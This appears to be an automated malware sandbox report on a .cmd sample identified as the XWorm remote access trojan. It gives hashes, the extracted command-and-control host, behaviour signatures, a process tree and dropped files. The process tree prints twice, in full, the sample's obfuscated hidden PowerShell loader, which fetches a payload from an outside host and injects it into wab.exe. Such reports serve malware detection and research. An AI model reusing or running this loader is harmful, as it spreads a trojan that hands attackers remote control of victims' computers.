Overview

overview

10

Static

static

1

00c866d489...43.cmd

windows7-x64

10

00c866d489...43.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-05-2024 13:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43.cmd

  • Size

    6KB

  • MD5

    0b65dcbdc755a516181f47d69f5aee10

  • SHA1

    fc9319ec254c2be1b7ba5174d36d142c1ce20440

  • SHA256

    00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43

  • SHA512

    e37aba32337a5bf8793721d8d9b9582c906b9820ace2a831d1f6e9548e6631942df0bdf6b56f07c1420fa7ade2d3a1e34bb27cab4ddc7d57a42672919f1ead1c

  • SSDEEP

    96:vEWuwXqdcs0faFF/oW8NYEpyGakOwJyZLLi8lTxd7Qhn004g6bnecFhZ3WjS:vurF8NY8yGywAL2Ox5QV004gIFhn

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
        3⤵
          PID:2632
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1656
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
            4⤵
              PID:2144
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1748

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        7c33d35025ffb50b725f61c7eeb42cf8

        SHA1

        e640c7ba2a2ef960ec25e340c7244bcc073eb87b

        SHA256

        45f1297369ac2f0493ad651c829a9a33a84b51b6871db447a768b574a874edb9

        SHA512

        9151f0b3d531e8eb69c964e5a855ab5da5a4eda974c7b19e63458b2f156f5d91d834965b314c7cbaffe5bda88292c81524bf55a87d648860de170954e1898078

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\TarA9CE.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Belejringstilstandenes.Unj
        Filesize

        465KB

        MD5

        61708c02a92801dea7267daf2300d321

        SHA1

        5414b3aed956e83fb5f196f44ce5888dcfd6e4a9

        SHA256

        3b1e99b27d0ac212ee8597aa77c4f3d242a198c06cbf5fc536b0e635a9f203f7

        SHA512

        5787bc03913eac9e7082657d2420e66ed0e7a481e75cccad7f077ee347146ccce06534ed8f7e5105895f9c4e3e011f74fdcd03088eee5736713bc09bb9c3fe85

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ2AWMZMVV81FPR65AGH.temp
        Filesize

        7KB

        MD5

        54c0b85bcc48ff8ab168c526dcecc885

        SHA1

        f2139998691c49bc9dc805c98d147e76ace3f688

        SHA256

        c156476e2e7c63366d6f6559dff062f7a0b76fd301b560b15c5bb6d7253b6ffd

        SHA512

        6d56388dd2e62cfdd314218208a75829b0f5dc685134736da13f62e48aafdc981fd50eb10ee3c237b2a9a3a5c60490adcd919894f5871c515ad7bfd2d4c8e57a

        Download Submit
      • memory/1656-60-0x00000000061D0000-0x000000000BFA9000-memory.dmp
        Filesize

        93.8MB

        Download
      • memory/1748-63-0x0000000000FD0000-0x0000000002032000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1748-90-0x0000000000FD0000-0x0000000002032000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1748-92-0x0000000000FD0000-0x0000000000FDE000-memory.dmp
        Filesize

        56KB

        Download
      • memory/2616-59-0x000007FEF632E000-0x000007FEF632F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2616-8-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2616-7-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2616-58-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2616-11-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2616-6-0x0000000002590000-0x0000000002598000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2616-4-0x000007FEF632E000-0x000007FEF632F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2616-5-0x000000001B390000-0x000000001B672000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2616-9-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2616-10-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2616-91-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
        Filesize

        9.6MB

        Download